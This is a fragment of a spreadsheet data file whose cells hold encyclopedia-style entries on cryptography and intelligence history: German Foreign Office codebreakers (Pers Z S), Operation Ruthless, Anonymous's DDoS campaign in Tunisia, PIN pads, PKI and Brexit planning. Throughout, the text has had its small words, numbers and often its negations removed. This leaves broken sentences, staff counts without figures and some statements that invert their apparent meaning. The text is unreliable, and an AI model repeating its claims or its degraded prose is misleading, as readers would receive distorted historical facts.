similar concepts created define standards electronic signatures. switzerland, digital signing standard zertes comparable standards address conformity regulation trust service providers product digital certificates.in united states, nist digital signature standard (dss) provide comparable standard regulating qualified certificates would address non-repudiation signatory's qualified certificate. amendment nist currently discussed would in-line eidas zertes handle trusted services. also qualified website authentication certificate references</t>
  </si>
  <si>
    <t>Pers Z S</t>
  </si>
  <si>
    <t>pers signal intelligence agency german foreign office (german: auswärtiges amt) world consisted cryptologic sections. pers cryptanalytic section called special service branch foreign office personnel department (german: sonderdienst referats personalabteilung auswärtigen amtes). mission solution foreign diplomatic codes ciphers. section, cryptography section called personal cipher service federal foreign office (german: personal chiffrierdienst auswärtigen amtes) (abbr. pers chi). latter section responsible compilation, distribution security foreign office codes ciphers. both colloquially known pers though similar nature operation okw/chi cipher bureau, civilian operation opposed military operation okw/chi focused primarily diplomatic communications. according ticom interrogators evinced extraordinary degree competence, primarily driven consistency development found german signals bureau period. pers s/chi symbol code name chiffrierdienst, i.e. cryptanalysis department pers although little known organization, final analysis, pers labored diplomatic cryptanalysis regime diplomatic solutions. short name abbreviation "chi" chiffrierabteilung contrary might expect, greek letter chi, anything test, common cryptographic test used part deciphering enciphered message, invented solomon kullback, first three letters word chiffrierabteilung (english: cipher department). history little known pers april 1945, first section captured. ticom (target intelligence committee), united states effort capture german intelligence assets war, found captured documents provided little information execution unit, records mathematical cryptological section destroyed. field covered pers countries period years, stymied ticom interrogators available, also lacked experience cryptographic diplomatic system. this first ticom investigation. inevitably areas covered. 1945, usual approach ticom force captured personnel write "homework" describing processes used particular intelligence unit interrogation, method fully developed. document prepared "homework" dated august 1945 professor hans rohrbach, along several pers colleagues, described cryptanalysis american strip cypher, considered significant piece work. 1919–1937 original name pers unknown likely political intelligence department, placed bureau (abteilung), normal administrative department german government organization time. cryptography unit grew, changed name personnel bureau later called chiffrierabteilung, later still sonderdienst referats personalabteilung auswärtigen amtes. 1925, known cryptographic cryptanalysis unified single director. 1919 kurt selchow joined organization immediately started professionalize cipher bureau. introduced system dividing work upon foreign codes ciphers sections various countries selected leaders sections pashke, kunze, schauffler known world i.the strength organization period unknown. 1945 paschke schauffler stated people employed 1918. 1919 list shows personnel employed, would likely cover clerks, administrators, communications liaison individuals. 1930 pers unit strength around personnel. 1937–1939 november 1937, pers around employees, july 1938, decreased people. thought cryptanalysis unit around people. under interrogation, paschke kunze estimated 1939, pers personnel included people. document captured december 1939, showed total strength people, another document stated appointments made september 1939, november 1939. thus would seem reasonable assume start pers personnel count available documentation 1937 1939 indicate branch suffered personnel shortages certain inertia within management. descriptions (german: begruendungen) attached recommendation promotion documentation detailed kunze specialist (german: regierungsrat) since 1923 paschke held grade since 1927. positions comparable activities responsibilities ministries given grade principal specialist (german: ministerialrat) senior specialist (german: oberregierungsrat). this spite fact personnel concerned usually younger less time grade. complained 1938 could function efficiently without additional personnel. thirteen cryptographers fifty years old, sixty. overloading cryptographic section, outgoing messages cannot enciphered checked necessary care. this regrettable state affair noticeable 1938 september 1938, political atmosphere tensest. cipher bureau organized follows: wartime little known pers start war. october 1940, around employees, kunze reporting ticom people working section january 1941 jaegerstrasse location, schauffler reporting personnel employed january 1941, berlin-dahlem avenue location. cipher bureaus, similar okw/chi, high command bureau b-dienst, navy cipher bureau, pers suffered chronic shortage personnel. november 1940, pers submitted list problems high command, primarily staff shortages, including major countries neglected. doctor kunze requested additional employees, would employees british american problems schauffler requested additional pers underwent major changes november–december 1943 unit split three groups partially evacuated berlin continuous bombing allies. schauffler pasche's unit remained berlin 2-6,5. linguists unit karstien, moved hischberg krkonoše. mathematicians kunze, together hollerith machinery evacuated hermsdorf silesia. towards war, february march 1945, unit fragmented spectre russian advance personnel located hirschberg group moved burgscheidungen joined former berlin personnel april. organization knit together daily courier service. later february 1945 mathematics based cryptanalysts subsection fragmented personnel moving mühlhausen, majority personnel moving zscheppelin, small village, around west delitzsch. intercept traffic received march 1945, however cryptanalysis continued burgscheidungen archive material, overrun april.it believed pers archives, consisted around chests, went south bavaria mühlhausen mid-april 1945. individual documents chests markings them, files folders marked geheime reichssache, secret realm. personnel administrative section minister (german: gosandtor ministerdirigigent. klasse) kurt selchow director branch. remained head cipher bureau 1945.senior specialist (oberregierungsrat) head administrative section branch. branch since early 1920s. taken prisoner mühlhausen april 1945, found little importance ticom (the united states target intelligence committee). senior specialist ernst hoffman seniority going back 1919. from 1940, head communication section branch, section newly created time. senior specialist horst hauthal head cryptographic section branch. rise branch considered meteoric peers. joined nazi party 1937 committed nazi. mathematician, economist, cryptographer, joined january 1940 promoted senior specialist 1945. after became german ambassador middle east north africa. later, 1960s early 1970s, negotiations first bilateral investment treaty pakistan. linguistics cryptanalytic section senior specialist (oberregierungsrat) rudolf schauffler, originally mathematician, nominal head linguistics cryptanalysis section least november 1937, senior cryptanalyst section. joined branch immediately world main field interest theoretical research (german: grundlagenforschung) cryptologic methodology. language specialties japanese chinese, also cryptanalytic desk headed. also served primary advisor foreign office cryptographic section (pers chi) security senior specialist adolf paschke became joint head linguistics cryptanalytics section along schauffler latter half world joined foreign office group 1919, became specialist (german: regierungsrat) 1927 became senior specialist (german: oberregierungsrat) 1939. 1941, recommended rank principal foreign office specialist (vortragender legationsrat). responsible report publishing translators. also responsible liaison german armed forces. language specialties italian, greek russian. adolf paschke nazi joined 1933.karl zastrow technical assistant (german: wissenschaftlicher hilfsarbeiter). senior member cryptanalytic section, entered service december 1918. known gifted analyst, never promoted absent minded. headed american scandinavian group directed hans-kurt mueller, zastrow deputy. unit's expert american systems.dr wilhelm brandes senior specialist (german: oberregierungsrat). brandes headed group directed paschke, worked penetrate cyphers dutch, swiss, belgian french origin. having worked paschke world started working pers 1920. known capable linguist, archivist bookbuilder, also certain liaison functions group. herrmann scherschmidt senior specialist (german: oberregierungsrat). starting foreign office 1919, specialized slavonic near eastern languages. headed pers turkish group 1934 1939. thereafter took slavonic group september 1943. wanting return turkish group, unable transferred translations unit (foreign office document section) september 1944. returned group (turkish, paschke), benzing, current head unit, shifted arabian iranian systems. hans-heidrun karstien. karstien joined pers sometime 1930. november 1937, unclassified employee (german: tarifangestellter) group highest grade. specialized japanese chinese systems cyphers, worked 1930 1938. november 1940, listed specialist balkan languages, handling bulgarian, croatian, polish, slovakian possibly finnish cyphers. taken prisoner april 1945. johannes benzing joined pers july 1937. youngest senior official (german: beamter) pers unit. linguist, specialist near eastern languages originally worked scherschmidt. headed section october 1939 september 1944. placed charge work iranian, iraqi afghanistani systems. ursula hagen technical assistant (grade (german: wissenschaftliche hilfsarbeiterin). considered difficult women pers achieve proper recognition seniority, hagen case point. born march 1901, entered unit october 1922. 1939 1945, head group, immediate manager paschke. responsible work england, ireland, spain, portugal latin american countries. manager group, responsible staff. grade remuneration never comparable similar staff responsibilities men. captured zschepplin 1945 evacuated marburg. hagen considered best successful cryptanalyst diplomatic office adolf paschke.dr hans-kurt mueller technical assistant (grade iii), born 1906, started working pers january 1940. specializing american scandinavian systems, listed zastrow's deputy (german: vertreter) time. april 1945 however, listed head group, zastrow deputy.dr peter olbricht former anthropologist ethnographic museum (german: museum völkerkunde), located prinz albrecht königgrätzer berlin started working unit december 1939. orientalist repute, specialized chinese, japanese manchurian codes, working direction schauffler. hirschberg group december 1943, eventually captured burgscheidungen. miss asta friedrichs. while holding rank, however, leading personalities pers joined september 1940 studying sorbonne america university sofia. working karstien, deputized slavonic group needed, specializing bulgarian. miss hildegarde schrader technical assistant (grade iv). miss schrader joined pers september 1939, specialized french codes. 1943 deputy brandes french-belgian-swiss section took brandes fell 1944, hirschberg. captured burgscheidungen. otfried deubner employed technical assistant (german: wissenschaftlicher hilfsarbeiter) grade iii. otfried started work unit july 1940. war, assistant paschke group handled vatican, italian, greece ussr desks. recommended specialist 1941 decided stay technical assistant. mathematical cryptological section senior specialist werner kunze cryptanalyst brilliant mathematician years pers experience. military cryptologist world joined foreign office 1919. kunze's subsection, mathematical-cryptanalytic subsection, operated apart main pers department (stammabteilung). subsection consisted linguist mathematicians, also responsible pers (hollerith) machinery. they specialized difficult systems complex message encryption, problems required large outlay expenditure time personnel, applications technical devices. december 1939, group members. prof hans rohrbach professor mathematics charles university prague. rohrbach split duties equally teaching cryptanalysis. started pers early 1940 senior civil servant (german: höherer beamter). having excellent command english language, worked english, american scandinavian well japanese desk. through personality alone, leading members pers awarded service cross class (german: kriegsverdienstkreuz klasse) september 1944 work solution u.s. diplomatic strip system o-2. helmut grunsky, mathematician, started working pers september 1939. previously teaching conducting research prussian academy sciences. technical assistant grade (wissenschaftlicher hilfsarbeiter) december 1940, recommended promotion specialist (regierungsrat) march 1941. hans-georg krug. little known joined pers probable joined early 1940. 1941 recommended promotion specialist. charge pers hollerith installations custom machinery.dr erika pannwitz. known pannwitz joined pers head group cryptanalysts april 1945klaus schultz joined pers start world professional mathematician statistician, worked german statistical office (german: statistisches reichsamt) war. worked kunze's section december 1939. last known civil service grade technical assistant grade (wissenschaftlicher hilfsarbeiter) march 1941, never promoted wardr annelise hünke started working pers august 1939, technical assistant grade iii. karl schröter joined pers spring 1941. mathematical theoretician university münster, received doctorate heinrich scholz. 1948 professor mathematics humboldt university berlin 1964 became member german academy science. worked independently japanese additive encipherment systems. personnel seconded okw/chi arthur grosse, specialized chinese japanese codes, edgar hierer, minor cryptanalyst, also worked japanese chinese codes cort rave, kurt rave, also specializing japanese, chinese code, members okw/chi seconded pers december 1943 okw/chi bombed building, bendlerblock, located tirpltzufer section berlin. working chinese japanese desk, hans rohrbach commented: ...definitely lower grade personnel come trained professor cort rove stated letter otto leiberich jürgen rohwer team linguists cryptanalysts, solved daily basis, japanese purple diplomatic cipher operations intercept network pers single intercept station, called landhaus dahlem, used cover priority communications, e.g. berlin ankara berlin lisbon, however message intercepts pers received bulk okw/chi, hermann göring's research office reich ministry (fa) german post office (german: reichspost). traffic intercepts sources generally unknown traffic intercept undergone post-processing arriving pers when bombed out, traffic received direct reichspost. operational environment linguist karstien, stated interrogation signal intelligence organization, cryptanalysts within received little official recognition senior officials foreign ministry, auswärtiges amt, even though quick complain. karstien stated kurt selchow might learn joachim ribbentrop, foreign minister interested specific area, perhaps balkans seldom specific guidance offered concerning needs senior officials. karstien stated: worked, entirely dark (german: arbeiteten vollständig dunkeln). reaction senior personnel foreign office rare. miss friedrichs stated: from time time copies messages issued returned bearing stamp indicating seen führer. otherwise, indication importance attached work ever penetrated level worked. occasionally staff member would receive praise. letter dated 1938, paschke received letter commendation undersecretary ernst weizsäcker, congratulating paschke particularly successful effort (german: besonders erfolgreiche bemühungen) italian work assigned him. hans rohrbach also awarded merit cross. cryptanalysts received neither acknowledgement recognition above, consequently worked administrative vacuum. attitude pers leaders some responsibility failure disseminate information internally, concerning successes, must assigned pers leaders. kurt selchow, characterized competent administrator knew little cryptography. selchow preoccupied bureaucratic intrigues ministry left substantive work paschke, schauffler kunze, subsections affairs fit. paschke hagen stated knew message content junior personnel. miss friedrich stated little encouragement given communication results inside organization junior members, encouraged mind business. linguistic section, desk chiefs left devices. they decided priorities deployed staff accordingly. seems pers personnel intelligence minded. they cryptanalysts thought primarily terms cryptanalysis, intelligence by-product work. handling processing decodes described above, instruction ribbentrop invariably general nature, solely concerned subject matter intelligence, e.g. poland invasion, concern details systems. kurt selchow dealt ribbentrop directly, schröder ernst weizsäcker, principal assistant ribbentrop. confuse chain command, miss ursula hagen stated interrogation received instructions direct "secretary", undersecretary gustav adolf steengracht moyland. pers evaluation unit desk chief deciding groups decrypts would circulated (without comment interpretation) higher authorities. since pers suffered chronic staff shortages, forced chiefs lend hand practical cryptanalysis well translation, leaving scant time selection process. according paschke, ribbentrop read 20-30% material produced. secretaries, weber karl_christian loesch, selected him. ribbentrop four items day, less. principal assistant gustav adolf steengracht moyland, secretaries, determined distributions made outside ministry. statements taken face value least five people involved determining distribution decodes, consequent disadvantages divided responsibility possible loss continuity. military historian, david alvarez stated: occasionally, ribbentrop would forward decrypt führer's hitlers attention, highly competitive world wartime german intelligence, knowledge control resources power, little incentive circulate product wider audience unlikely ribbentrop shared decrypts departments. unknown pers intelligence integrated total intelligence picture. officials interrogated nuremberg trials agreed central clearing house intelligence top. wilhelm keitel know whether received pers decodes. alfred jodl knew general foreign office achievements, receive pers output. where messages solved okw/chi also hands foreign office, copy decrypt form reliable report (german: verlässliche nachrichten) (abbr. passed them. keitel enlightening quote, stated pers nuremberg trials, were: extremely secretive jealous anything bureau produced. chance, keitel produced direct hitler okw/chi diplomatic decode pass foreign office, became extremely annoyed. actually, happened rarely. mention made decoded exchanged agencies technical purposes, decodes exchanged agency heads used intelligence purpose. collegiate atmosphere working environment pers closer university faculty intelligence agency. there little sense urgency. desk chiefs, took pride linguistic abilities staff high standards translation, might hold decrypt every nuance meaning intention uncovered. crypt-analytical problems considered intellectual exercises rather potential sources intelligence. lacking guidance feedback final user product, code-breakers came consider cryptanalysis rather instrument production intelligence. cryptographical achievements organization grew organically world small organization grew along personnel factors logical plan. although schauffler unit's leader interwar period, paschke, successful cryptanalyst, forceful personality nazi, assumed leadership role. however, ticom interrogations could find definitive documentation assert unit 1945. possible none, seems probable paschke deference schauffler's seniority, actual administrative changes occurred. kunze leading mathematical cryptanalyst. mathematical linguistic cryptanalysis there little terms organization pers april 1945, world coming end. working conditions meant elements unit working general area, since evacuation berlin november 1943. however, cardinal organization rule followed: rule mathematical cryptanalysis involving initial solution extremely difficult systems, solutions complex encipherments additives application machine systems techniques problems kept separate linguistic cryptanalysis. this defined current solutions known additive enciphering systems, code-book reconstruction, translation publication. schauffler's responsibilities theoretical research cryptanalytic methods systems, publications consultation cryptographic section (pers chi) security systems processes foreign office. linguist headed group whose specialties japanese chinese, paschke. linguistic cryptanalysis subsection this subsection managed paschke consisted number small linguistic groups, organized along semi-linguistic semi-geographical lines. organization appeared fluid, varying according metrics like intelligence cryptanalytic priorities. organized following groups. personal considerations seemed played part organization subsection. mathematical cryptanalysis subsection kunze responsible subsection, never precisely defined. believed loose internal organization enabled personnel focus full concentration important problems arose assumed ticom document captured january 1941, subsection groups: england, america, japanese diplomatic, japanese military, greece study german systems procedures (german:eigene verfahren). machinery section hollerith machinery since 1942. tabulating machinery used solving solution difficult additives superencipherment (double encryption multiple encryption). world machinery installation had: alphabetic punches (german: alphabetische locher) (punched tape) sorters machines (german: sortiermaschinen) collators (german: kartenmischer) (collation) reproducers (german: kartendoppler) number punchers (german: rechenlocher) alphabetic tabulators (german: alphabetishe tabelliermaschinen) (tabulating machine) calculating tabulators (german: tabelliermaschinen 11)a number accessories designed machines. sorting machines, devices, card counter (german: kartenzähler) number finder (german: :nummernsucher). alphabetical tabulators attachment prevented machine printing unless identical cards, useful finding repeats. possibly hollerith machine made german firmthe useful special device so-called automaton, rapid deciphering machine developed american diplomatic strip cypher another machine developed, type comparator (german: spezialvergleicher), solve japanese transposition ciphers dragging message cipher text. cryptanalysis successes considering small staff pers had, conclusion must drawn pers cypher cryptanalysis skills considerable. countries diplomatic intercepts monitored, three used diplomatic systems completely defied successful analysis; russia, czechoslovakia poland 1942-1943. cryptanalysis successes country detailed listing cryptanalytic successes individual countries. pers never worked commercial cyphers codes like bank england code. pers little known pers encryption service (german:chiffrier-dienst). responsible compilation, preparation distribution codes cyphers used foreign office. personnel consulted pers matters security. senior specialist horst hauthal responsible pers 1943-1945. prior that, head senior specialist langlotz, died 1953.pers used t52c teleprinter cipher machines secure communications, known cryptologically weak. liaison liaison general nachrichtenaufklärung regards inspectorate 7/vi, (okh/chi), cipher department german army (wehrmacht), concomitant unit grew okh/gdna, examples collaboration pers senior administrative level. otto buggisch, formerly inspektorate 7/vi later okw/chi, gave available information ticom. buggisch worked french language group inspektorate november 1941 august 1942 period collaborated kunze five-digit degaulle code. also worked kunze regarding swiss enigma general alfred jodl, chief armed forces operations staff (oberkommando wehrmacht) stated receive decodes went directly foreign minister, knew general pers professionalism commitment. general lack collaboration pers inspektorate point lack coordination senior administrative function, professional jealously agencies. essentially agencies distinct operational foci. pers diplomatic okh/chi military agency. therefore, little need detailed collaboration. liaison b-dienst army, navy occasions work pers their operation tactical problem domains dissimilar stimulate effective collaboration. admiral karl dönitz, stated: [he] knowledge cryptanalytic bureaus maintained services departments... civil bureaus, never tried find out, [as] him. wilhelm tranow b-dienst knew schauffler slightly collaborated japanese intercepts, tranow never time address them. miss hagen reported 1942 english desk sent results british cyphers b-dienst, received nothing return. may, perhaps, occurred miss hagen cyphers would interest b-dienst, pers cryptanalysts never exposed intelligence value intercepts, manner agency staff sometimes were. liaison luftwaffe luftnachrichten abteilung similar agency, luftwaffe cipher bureau, luftnachrichten abteilung 350, earlier called chi-stelle, primarily interested intercepts emanating allied counterparts. military agency, diplomatic traffic would probably outside scope. however, main concomitant instances collaboration. according schauffler, first occurred 1939, kunze approached luftnachrichten abteilung assistance british weather ciphers nothing known extent success collaborative effort. second area collaboration noted chief cryptanalyst specialist erich hüttenhain okw/chi letter dated july 1943 stated: three weeks discussion held foreign office kunze [and] regierungsrat ferdinand voegele, (chief luftwaffe cryptanalysts). voegele declared willingness cooperate am10 cypher, (german name strip system) kunze declared willingness provide necessary material. voegele held fortnight. when pressed production promised material, kunze stated changed mind would providing material, voegele made disparaging remarks work. suggestion: head okw/chi arrange paschke already planned collaboration pers okl-stelle obdl actually come force. should pers consent, okw/chi terminate agreement pers free hand, okw/chi collaborate force... this incident mentioned pers voegele interrogations. military historian david alvarez stated reason cooperation deal collapsed voegele made disparaging remarks kunze's work. liaison research office reich ministry unsigned letter, dated february 1934, probably written paschke stated: captain hans oschmann...mentioned utterance chief, korvettenkapitaen paztzig, effect cryptanalytic connections forschungsamt dropped, since cryptanalytic work belong province forschungsamt. letter probably represent pers attitude, constitute first indication pers ticom documentation third competitor goering's research office reich ministry, informally called forschungsamt. later material pers collaboration fragmentary none later 1942. although dates given, hermann göring stated: ...the foreign office continuously tried interfere [with research bureau]. statement might motivated professional competitive aversion joachim ribbentrop, diplomat foreign minister nazi regime also agencies covered field unfortunately almost complete duplication. paschke's statement general "less liaison forschungsamt okw/chi".dr paschke, homework ticom stated: loyally affirm workers collaborated openly honorably, withheld nothing furthered work. unit received certain amount intercepts until november 1943, bombed, acted forwarding agent traffic intercepted postoffice, radiogram cablegrams intercept traffic, forwarded pers directly after bombed out, unit received intercepts direct postoffice. there little evidence official liaison bureaus. minister seifert stated intelligence produced distributed departments including pers s...at departments liaison officers. gerstmeyer details fa-pers liaison officers (german:verbingungs-mann). sauerbier stated liaison unit handled single representative, never involved exchange visits operations personnelwhen pers interrogated ticom team first learned existence foreign office cryptanalysts, knew names many section heads department work related yearly report 1942 aa/per inter alia, reveals exchange code book recoveries. name senior specialist waechter appears yearly report names personnel occur code books stored aa/per archives. from evidence clear technical cryptanalyst liaison existed aa/per evidence following tentative assertions made period 1940-1942: there extensive duplication effort aa/pers there official liaison aa/pers seem fully operative. there significant amount technical cryptanalyst liaison agencies working problem, concomitant exchange information. unknown whether liaison continued war. notes ticom, united states effort seize german intelligence world document archive consists primary documents volume volume these primary volumes, aggregate summary documentation, volume targeting specific german military agency. archive also consists team reports, df-series, i-series, if-series m-series reports cover various aspects ticom interrogation. volume covers aa/pers contains references i-series ticom documents ticom intelligence reports, covers references full gamut types reports, e.g. df-series, if-series, 1500 reports. following document directly referenced article: ticom i-22 interrogation german cryptographers pers department auswäertiges amt. july 1945 (pdf). ticom. retrieved february 2017. "ticom i-54 second interrogation five members rlm/forschungsamt. august 1945" (pdf). ticom. retrieved february 2017. ticom i-58 interrogation otto buggisch okw/chi august 1945 (pdf). ticom. retrieved february 2017. "ticom i-63 interrogation report herrmann scherschmidt auswäertiges amt. august 1945" (pdf). ticom. retrieved february 2017. "ticom i-89 report rohrbach pers. american strip cypher [0-2 cypher] august 1945" (pdf). ticom. retrieved february 2017. ticom i-103 second interrogation r.r. hermann scherschmidt pers. auswärtiges amt, turkish bulgarian systems. september 1945 (pdf). ticom. retrieved february 2017. ticom i-143 report interrogation five leading germans nuremberg september 1945 (pdf). ticom. retrieved february 2017. ticom i-172 interrogations hagen paschke pers december 1945 (pdf). ticom. retrieved february 2017. "ticom i-208 interrogation report kurt selchow, former head pers department german ministry foreign affairs october 1947" (pdf). ticom. retrieved march 2017. ticom d-60 miscellaneous papers file erich hüttenhain okw/chi. december 1945 (pdf). ticom. retrieved february 2017. missing ticom documents notes minutes high-level meetings held okw/chi. i-84 further interrogation huettenhain sdf. fricke okw/chi i-147 detailed interrogation members 4/skl flensburg. i-163 report interrogation hauptmann scheidl, lieutenant sann lieutenant smolin, i/ln rgt. (east), german sigint activity against russian forces. d-16 translation annual progress reports pers covering 1927, 1941, 1942. df-17 translation 3273, letter paschke pers personnel. translated pettengill. (t-165). references</t>
  </si>
  <si>
    <t>PKIoverheid</t>
  </si>
  <si>
    <t>pkioverheid public infrastructure (pki) dutch government. like pki, system issues manages digital certificates realized. pkioverheid logius. external links pkioverheid.nl</t>
  </si>
  <si>
    <t>PIN pad</t>
  </si>
  <si>
    <t>entry device (ped) electronic device used debit, credit smart card-based transaction accept encrypt cardholder's personal identification number (pin). pads normally used payment terminals, automated teller machines integrated point sale devices electronic cash register responsible taking sale amount initiating/handling transaction. required read card allow securely entered encrypted sent bank. cases, chip cards, transferred card verified chip card. case need sent bank card scheme verification. (this known "offline verification".) like stand-alone point sale devices, pads equipped hardware software security features ensure encryption keys erased someone tries tamper device. encrypted immediately entry encrypted block created. this encrypted block erased soon sent attached point sale device and/or chip card. pins encrypted using variety encryption schemes, common 2010 triple des. pads must approved standards required payment card industry ensure provide adequate security point entry encryption process. 9564 international standard management security, specifies required recommended characteristics entry devices.although pads nominally allow entry numeric values, pads also letters assigned digits, allow alphabetic characters words mnemonic numeric pin. pads necessarily letters numbers. 9564 mandate particular assignment letters, includes examples differ digits assigned. certifications payment card industry abecs paypass paywave expresspay also payment terminal references</t>
  </si>
  <si>
    <t>Operation Ruthless</t>
  </si>
  <si>
    <t>operation ruthless name deception operation devised fleming british admiralty world attempt gain access german naval enigma codebooks. background with help polish allies, british codebreakers bletchley park considerable success decoding enigma-enciphered traffic german force, army intelligence counter-espionage service (abwehr), made little progress german naval messages. methods communicating choice starting positions, enigma's rotors, indicator, much complex naval messages. 1940 dilly knox, veteran world codebreaker, frank birch, head bletchley park's german naval department, leading codebreakers, alan turing peter twinn knew getting hold german navy enigma documentation best chance making progress breaking code.the royal navy's operational intelligence centre (oic) leading user ultra intelligence bletchley park's decrypts. lieutenant commander fleming admiralty's naval intelligence division, later wrote james bond novels, personal assistant director naval intelligence, rear admiral john godfrey. fleming liaised naval department bletchley park, visiting twice month, well aware problem. plan september 1940, fleming wrote note godfrey read: suggest obtain loot following means:1. obtain ministry air-worthy german bomber. pick tough crew five, including pilot, operator word-perfect german speaker. dress german force uniform, blood bandages suit. crash plane channel making s.o.s. rescue service p/l. once aboard rescue boat, shoot german crew, dump overboard, bring rescue boat back english port. order increase chances capturing with, richer booty, crash might staged mid-channel. germans would presumably employ type longer hazardous journey. 12.9-40. plan german bomber would follow behind aircraft returning night bombing raid. when crossing middle english channel, would engine lose height smoke pouring 'candle' tail, send distress signal ditch sea. crew would take rubber dinghy, ensured bomber sank germans could identify wait rescued german naval vessel. when board 'survivors' would kill german crew, hijack ship, thus obtaining enigma documentation.a heinkel available operation. aircraft, werk 6853, captured airworthy condition operated german bomber unit, kampfgeschwader february 1940, made forced landing near north berwick damaged spitfire firth forth. subsequently assigned royal force serial number aw177 flown raf's fighting development unit 1426 flight. fleming proposed crew but, someone knew bletchley park, could placed risk captured. aircraft prepared aircrew german-speaking englishmen. operation planned early part month known code sheets changed start month. outcome fleming took team dover await next suitable bombing raid, aerial reconnaissance wireless telegraphy monitoring failed find suitable german vessels, operation called off. that major disappointment codebreakers judged frank birch wrote letter dated october 1940. turing twinn came like undertakers cheated nice corpse days ago, stew cancellation operation ruthless. burden song importance pinch. alternative account operation take place given niece, lucy fleming, visited office admiralty. bond correspondence, radio radio programme broadcast 2008, includes interview there. subject admiralty says idea germans would floating bomber "survivors" send rescue vessel; someone pointed downed heinkel bomber would sink rather float. references further reading budiansky, stephen. battle wits: complete story codebreaking world penguin books ltd, 2001, isbn 0-14-028105-3, pgs. hoare, oliver. code breaking world public record office, 2002, isbn 1-903365-40-6, pgs. james bond creator's preposterous plan outwit nazis revealed o'keefe, david. "one august untold story behind canada's tragedy dieppe", alfred knopf canada, 2013, isbn 978-0-345-80769-4, pgs.</t>
  </si>
  <si>
    <t>Operation Tunisia</t>
  </si>
  <si>
    <t>operation tunisia refers actions internet group anonymous tunisian revolution. tactics traditional manner; anonymous launched series ddos attacks government websites. additionally, anonymous provided protesters documents required take incumbent government well distributing care package, among things, including tor, greasemonkey script avoid proxy interception government. providing information considered part operation leakspin. they also aided passing information protests country. aftermath first anonymous posted video youtube declaring intentions. anonymous began ddos attacks. multiple government websites tunisia soon taken offline result attacks. anonymous supplied protesters, tunisian blogger slim amamou, anonymising software tor. while group waged online, large-scale professional strikes tunisia's professional class lawyers teachers also occurring, culminated fleeing president january 2011. tunisian involvement some anonymous members #optunisia channel tunisians, called 'slim404', whose real name slim amamou, tunisian blogger. aided passing software anonymous protestors. amamou arrested jan. 2011. later released jail went become secretary state sport youth, resigned protest transitional government's censorship web. also tunisian revolution arab spring references external links https://www.anonymoustunisie.com/ website anonymous</t>
  </si>
  <si>
    <t>Operation Yellowhammer</t>
  </si>
  <si>
    <t>operation yellowhammer codename used british treasury cross-government civil contingency planning possibility brexit without withdrawal agreement no-deal brexit. failed conclude agreement, uk's unilateral departure could disrupted, unknown duration, many aspects relationship european union, including financial transfers, movement people, trade, customs regulations. operation yellowhammer intended mitigate, within effects disruption, expected approximately three months. developed civil contingencies secretariat (ccs), department cabinet office responsible emergency planning. early august 2019, boris johnson become prime minister, cabinet office "was able confirm" operation yellowhammer plan remained place, although yellowhammer document earlier month leaked mid-august sunday times journalist rosamund urwin continues updated.on september 2019, chancellor duchy lancaster michael gove, whose responsibilities included preparations no-deal brexit, said house commons: "operation yellowhammer assumptions prediction likely happen, best-case scenario list probable outcomes, projections happen worst-case scenario." otherwise unchanged version yellowhammer leaked earlier times titled "base case" scenario rather "reasonable worst case" scenario officially published document; copy given scottish government titled "base scenario".the sunday times reported operation yellowhammer three scenarios studied, operation kingfisher, involving support package distressed british businesses, operation black swan, disaster scenario. michael gove characterised report inaccurate. disclosure naming existence operation leaked september 2018, press photographer captured snapshot document revealing "no-deal" plans treasury codename them. document appeared indicate used anticipation government policy. details revealed. national audit office (nao) subsequently made documents public relating operation.the operation code name "yellowhammer", relates small songbird, chosen random according times.on february 2019, times received leaked documents code name, department transport command control structure plans. activation plan operation yellowhammer covers actions taken no-deal scenario, would implemented prior date leaving.on january 2019 house commons voted, non-binding ballot, reject no-deal brexit. unless house commons accept brexit withdrawal agreement, eu's members grant extension article lisbon treaty, revoke article notice, united kingdom would default exited march 2019 deal.on march 2019, kent county council activated plans keep roads, hospitals schools open, brexit secretary, steve barclay, said operation yellowhammer command control structures would "enacted fully" march 2019 unless exit date agreed march 2019, ministry defence staffed bunker whitehall headquarters coordinate no-deal related military activities operation redfold, cobra emergency committee took control no-deal planning intentions implement national contingency plans march 2019.late march 2019, possible exit dates agreed 2019 house commons approved brexit withdrawal agreement march 2019; april 2019 otherwise.consequently, full activation operation yellowhammer postponed april 2019.on april 2019 european council granted six-month extension; yellowhammer's 6,000-strong civil service team disbanded weeks afterwards, members returning usual activities. developments since theresa resigning leader conservative party candidates replace talking leaving without deal october deadline make necessary resume preparations. institute government said government never ready no-deal brexit original departure date march. according owen, ifg's brexit programme director, reinstating yellowhammer reinstating thousands civil servants implement no-deal contingency plans formidable task; everything need "resurrected restaffed, earlier rounds staff training need repeated". according financial times others, sign already time.on monday october 2019, cabinet office announced held emergency operation yellowhammer cabinet meeting sunday 20th 2019, "triggering" plan, said guarantee would grant extension. this followed prime minister's compliance october) obligation benn request extension article brake, liberal democrat's brexit spokesman said need extension, required, granted, leaving yellowhammer nothing expensive taxpayer-funded stunt." granted requested extension week later, october. preparedness european union issued press release march 2019 indicating completed preparations (what then) increasingly likely "no-deal" scenario april 2019. possible activation 2021 transition period january 2021, deadline extension expired june 2020. there legal provision extension; would require legislation member state. august 2020, "little progress" towards deal principle, alone detailed text. time required ratification leaves late october latest possible date. august 2020 round negotiations, chief negotiator michel barnier, noting little time remained, said "seems unlikely" agreement reached. organisation operation yellowhammer developed civil contingencies secretariat, though cobra took control march 2019. organised command control structure (c3), co-ordinate: british government departmentsif government department's contingency plans inadequate operation yellowhammer take planning decisions department.approximately local resilience forums england wales similar bodies northern ireland scotland governing authorities united kingdom, overseas territories crown dependencies co-ordination impacted industries sectors.major decisions taken european union exit trade (preparedness) sub-committee, january 2019 chaired prime minister. wide-ranging powers order emergency measures, including military, overriding regulations. relationships work department exiting european union (dexeu) achieve objective brexit work, dexeu concentrating policies, legislative changes required funding changes dealing steps mitigate manage short-term disruption. example objective would continuity supply medicines deal exit falling within areas risk goods crossing borders transport systems. arrangements prioritisation goods, additional ferry capacity procedures place operation customs operations effective immediately brexit date areas covered.: areas risk operation yellowhammer identifies areas risk. these include food medicine supply chains status british citizens residing there also three risks common areas.: twelve areas risk identified are: transport systems, people crossing borders, goods crossing borders, healthcare services, british energy critical systems, british food water supplies, british nationals enforcement implications, banking finance industry services, brexit irish border, specific risks overseas territories crown dependencies (including effect brexit gibraltar) national security.: risks common areas identified are: legal, communications data.: costs resources march 2019 people working internally programme; estimated would needed maintain operations centre budgeted cost £1.1 million 2018–2019. this context british treasury allocating £1.5 billion brexit preparations government departments 2018–2019.3,500 troops placed standby 'assist civil power' event issues arising no-deal exit, although ministry defence disclosed mission "support government planning". criticism march 2019, british government's decision risk no-deal brexit invoke operation yellowhammer criticised 